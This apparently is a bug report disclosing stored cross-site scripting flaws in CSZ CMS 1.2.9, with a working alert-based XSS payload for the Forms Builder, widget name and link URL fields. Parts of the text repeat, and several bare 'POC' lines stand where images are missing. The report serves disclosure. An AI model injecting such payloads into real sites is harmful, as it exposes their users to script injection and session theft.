Multiple Stored XSS Cross-Site Scripting on CSZ CMS 1.2.9
Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager.
Forms Builder
- Add or edit Forms Builder:
Forms Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
POC
XML Plugin Widgets
- Add or edit Widgets:
Widget Name: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">
POC
Statistic for link
- Add New Link:
URL: <noframes><p title="</noframes><svg/onload=alert(document.domain)>">```
Multiple Stored XSS Cross-Site Scripting on CSZ CMS 1.2.9
Login with editor account with rights to Forms Builder, XML Plugin Widgets, Statistic for link, Banner Manager, Carousel Widget, Pages Content, Language, Plugin Manager.
POC

POC

POC

POC

POC

POC

POC

POC

The text was updated successfully, but these errors were encountered: